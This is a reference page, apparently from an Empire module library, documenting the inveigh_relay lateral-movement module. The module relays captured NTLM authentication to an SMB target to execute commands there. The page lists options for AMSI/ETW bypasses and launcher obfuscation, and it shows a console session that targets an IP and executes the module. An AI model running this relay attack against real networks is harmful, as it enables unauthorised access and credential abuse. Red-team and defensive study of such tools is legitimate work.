Invoke-InveighRelay - Empire Module
This page contains detailed information about how to use the powershell/lateral_movement/inveigh_relay Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-InveighRelay
Module: powershell/lateral_movement/inveigh_relay
Source code [1]: empire/server/modules/powershell/lateral_movement/inveigh_relay.yaml
Source code [2]: empire/server/modules/powershell/lateral_movement/inveigh_relay.py
MITRE ATT&CK:
T1171
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: Yes
The inveigh_relay module is the Inveigh's SMB relay function. This module can be used to relay incoming HTTP/Proxy NTLMv1/NTLMv2 authentication requests to an SMB target. If the authentication is successfully relayed and the account has the correct privilege, a specified command or Empire launcher will be executed on the target PSExec style. This module works best while also running collection/inveigh with HTTP disabled. Note that this module exposes only a subset of Inveigh Relay's parameters. Inveigh Relay can be used through Empire's scriptimport and scriptcmd if additional parameters are needed.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the inveigh_relay module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the inveigh_relay module:
Agent
Agent to run module on.
RunTime
Run time duration in minutes.
Target
IP address or hostname of system to target for relay.
Additional Module Options
This is a list of additional options that are supported by the inveigh_relay module:
Bypasses
Bypasses as a space separated list to be prepended to the launcher.
Default value: mattifestation etw
.
Command
Command to execute on relay target. Do not wrap in quotes and use PowerShell escape characters and newlines where necessary.
ConsoleOutput
(Low/Medium/Y) Default = Y: Enable/Disable real time console output. Medium and Low can be used to reduce output.
ConsoleStatus
Interval in minutes for displaying all unique captured hashes and credentials. This will display a clean list of captures in Empire.
ConsoleUnique
(Y/N) Default = Y: Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations.
HTTP
(Y/N) Default = Y: Enable/Disable HTTP challenge/response capture/relay.
Listener
Listener to use.
Obfuscate
Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.
Default value: False
.
ObfuscateCommand
The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.
Default value: Token\All\1
.
Proxy
(Y/N) Default = N: Enable/Disable Inveigh\'s proxy server authentication capture/relay.
ProxyCreds
Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
Default value: default
.
ProxyPort
Default = 8492: TCP port for Inveigh\'s proxy listener.
Proxy_
Proxy to use for request (default, none, or other).
Default value: default
.
SMB1
(Switch) Force SMB1.
Service
Default = 20 character random: Name of the service to create and delete on the target.
UserAgent
User-agent string to use for the staging request (default, none, or other).
Default value: default
.
Usernames
Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format.
WPADAuth
(Anonymous/NTLM) HTTP listener authentication type for wpad.dat requests.
Inveigh_relay Example Usage
Here's an example of how to use the inveigh_relay module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/lateral_movement/inveigh_relay
Author Kevin Robertson
Background True
Comments https://github.com/Kevin-Robertson/Inveigh
Description Inveigh's SMB relay function. This module can be used to relay
incoming HTTP/Proxy NTLMv1/NTLMv2 authentication requests to an SMB
target. If the authentication is successfully relayed and the account
has the correct privilege, a specified command or Empire launcher will
be executed on the target PSExec style. This module works best while
also running collection/inveigh with HTTP disabled. Note that this
module exposes only a subset of Inveigh Relay's parameters. Inveigh
Relay can be used through Empire's scriptimport and scriptcmd if
additional parameters are needed.
Language powershell
Name powershell/lateral_movement/inveigh_relay
NeedsAdmin False
OpsecSafe False
Techniques http://attack.mitre.org/techniques/T1171
,Record Options----,--------------------,----------,-------------------------------------,
| Name | Value | Required | Description |
|------------------|--------------------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|------------------|--------------------|----------|-------------------------------------|
| Bypasses | mattifestation etw | False | Bypasses as a space separated list |
| | | | to be prepended to the launcher. |
|------------------|--------------------|----------|-------------------------------------|
| Command | | False | Command to execute on relay target. |
| | | | Do not wrap in quotes and use |
| | | | PowerShell escape characters and |
| | | | newlines where necessary. |
|------------------|--------------------|----------|-------------------------------------|
| ConsoleOutput | | False | (Low/Medium/Y) Default = Y: |
| | | | Enable/Disable real time console |
| | | | output. Medium and Low can be used |
| | | | to reduce output. |
|------------------|--------------------|----------|-------------------------------------|
| ConsoleStatus | | False | Interval in minutes for displaying |
| | | | all unique captured hashes and |
| | | | credentials. This will display a |
| | | | clean list of captures in Empire. |
|------------------|--------------------|----------|-------------------------------------|
| ConsoleUnique | | False | (Y/N) Default = Y: Enable/Disable |
| | | | displaying challenge/response |
| | | | hashes for only unique IP, |
| | | | domain/hostname, and username |
| | | | combinations. |
|------------------|--------------------|----------|-------------------------------------|
| HTTP | | False | (Y/N) Default = Y: Enable/Disable |
| | | | HTTP challenge/response |
| | | | capture/relay. |
|------------------|--------------------|----------|-------------------------------------|
| Listener | | False | Listener to use. |
|------------------|--------------------|----------|-------------------------------------|
| Obfuscate | False | False | Switch. Obfuscate the launcher |
| | | | powershell code, uses the |
| | | | ObfuscateCommand for obfuscation |
| | | | types. For powershell only. |
|------------------|--------------------|----------|-------------------------------------|
| ObfuscateCommand | Token\All\1 | False | The Invoke-Obfuscation command to |
| | | | use. Only used if Obfuscate switch |
| | | | is True. For powershell only. |
|------------------|--------------------|----------|-------------------------------------|
| Proxy | | False | (Y/N) Default = N: Enable/Disable |
| | | | Inveigh\'s proxy server |
| | | | authentication capture/relay. |
|------------------|--------------------|----------|-------------------------------------|
| ProxyCreds | default | False | Proxy credentials |
| | | | ([domain\]username:password) to use |
| | | | for request (default, none, or |
| | | | other). |
|------------------|--------------------|----------|-------------------------------------|
| ProxyPort | | False | Default = 8492: TCP port for |
| | | | Inveigh\'s proxy listener. |
|------------------|--------------------|----------|-------------------------------------|
| Proxy_ | default | False | Proxy to use for request (default, |
| | | | none, or other). |
|------------------|--------------------|----------|-------------------------------------|
| RunTime | | True | Run time duration in minutes. |
|------------------|--------------------|----------|-------------------------------------|
| SMB1 | | False | (Switch) Force SMB1. |
|------------------|--------------------|----------|-------------------------------------|
| Service | | False | Default = 20 character random: Name |
| | | | of the service to create and delete |
| | | | on the target. |
|------------------|--------------------|----------|-------------------------------------|
| Target | | True | IP address or hostname of system to |
| | | | target for relay. |
|------------------|--------------------|----------|-------------------------------------|
| UserAgent | default | False | User-agent string to use for the |
| | | | staging request (default, none, or |
| | | | other). |
|------------------|--------------------|----------|-------------------------------------|
| Usernames | | False | Comma separated list of usernames |
| | | | to use for relay attacks. Accepts |
| | | | both username and domain\username |
| | | | format. |
|------------------|--------------------|----------|-------------------------------------|
| WPADAuth | | False | (Anonymous/NTLM) HTTP listener |
| | | | authentication type for wpad.dat |
| | | | requests. |
'------------------'--------------------'----------'-------------------------------------'
(Empire: usemodule/powershell/lateral_movement/inveigh_relay) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/lateral_movement/inveigh_relay) > set RunTime value
[*] Set RunTime to value
(Empire: usemodule/powershell/lateral_movement/inveigh_relay) > set Target 192.168.100.1
[*] Set Target to 192.168.100.1
(Empire: usemodule/powershell/lateral_movement/inveigh_relay) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Author
- Kevin Robertson
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/lateral_movement/inveigh_relay.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/lateral_movement/inveigh_relay.py
- https://github.com/Kevin-Robertson/Inveigh
- http://attack.mitre.org/techniques/T1171
See Also
Check also the following modules related to this module:
- powershell/lateral_movement/invoke_psexec
- powershell/lateral_movement/invoke_sqloscmd
- powershell/lateral_movement/invoke_psremoting
- powershell/lateral_movement/invoke_executemsbuild
- powershell/lateral_movement/invoke_dcom
- powershell/lateral_movement/invoke_portfwd
- powershell/lateral_movement/jenkins_script_console
- powershell/lateral_movement/new_gpo_immediate_task
- powershell/lateral_movement/invoke_smbexec
- powershell/lateral_movement/invoke_wmi
- powershell/lateral_movement/invoke_wmi_debugger
- powershell/lateral_movement/invoke_sshcommand
- powershell/collection/inveigh
- python/lateral_movement/multi/ssh_launcher
- python/lateral_movement/multi/ssh_command
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.